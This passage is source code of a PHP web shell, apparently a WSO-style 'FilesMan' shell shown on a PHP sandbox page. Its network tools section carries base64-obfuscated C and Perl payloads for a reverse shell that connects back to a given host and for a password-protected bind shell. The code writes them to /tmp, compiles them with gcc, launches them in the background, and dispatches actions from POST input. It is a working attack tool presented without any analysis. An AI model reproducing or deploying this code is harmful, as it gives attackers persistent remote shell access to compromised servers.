echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';

}

} else {

echo htmlspecialchars($db->error());

}

echo '</div>';

hardFooter();

}

function actionNetwork() {

hardHeader();

$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";

$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";

$bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";

$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";

echo "<h1>Network tools</h1><div class=content>

Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass'> Using: <label><select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select></label> <input type=submit value='submit'>

</form>

<span>Back-connect to</span><br/>

Server: <input type='text' name='server' value=". $_SERVER['REMOTE_ADDR'] ."> Port: <input type='text' name='port' value='31337'> Using: <label><select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select></label> <input type=submit value='submit'>

</form><br>";

if(isset($_POST['p1'])) {

function cf($f,$t) {

$w=@fopen($f,"w") or @function_exists('file_put_contents');

if($w) {

@fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));

@fclose($w);

}

if($_POST['p1'] == 'bpc') {

cf("/tmp/bp.c",$bind_port_c);

$dokas = ex("gcc -o /tmp/bp /tmp/bp.c");

@unlink("/tmp/bp.c");

$dokas .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");

echo "<pre class=ml1>$dokas".ex("ps aux | grep bp")."</pre>";

}

if($_POST['p1'] == 'bpp') {

cf("/tmp/bp.pl",$bind_port_p);

$dokas = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");

echo "<pre class=ml1>$dokas".ex("ps aux | grep bp.pl")."</pre>";

}

if($_POST['p1'] == 'bcc') {

cf("/tmp/bc.c",$back_connect_c);

$dokas = ex("gcc -o /tmp/bc /tmp/bc.c");

@unlink("/tmp/bc.c");

$dokas .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");

echo "<pre class=ml1>$dokas".ex("ps aux | grep bc")."</pre>";

}

if($_POST['p1'] == 'bcp') {

cf("/tmp/bc.pl",$back_connect_p);

$dokas = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");

echo "<pre class=ml1>$dokas".ex("ps aux | grep bc.pl")."</pre>";

}

echo '</div>';

hardFooter();

}

if( empty($_POST['a']) )

if(isset($dect) && function_exists('action' . $dect))

$_POST['a'] = $dect;

else

$_POST['a'] = 'FilesMan';

if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )

call_user_func('action' . $_POST['a']);

457.php - PHP Online

Form of PHP Sandbox

Result of php executing

Full code of 457.php.php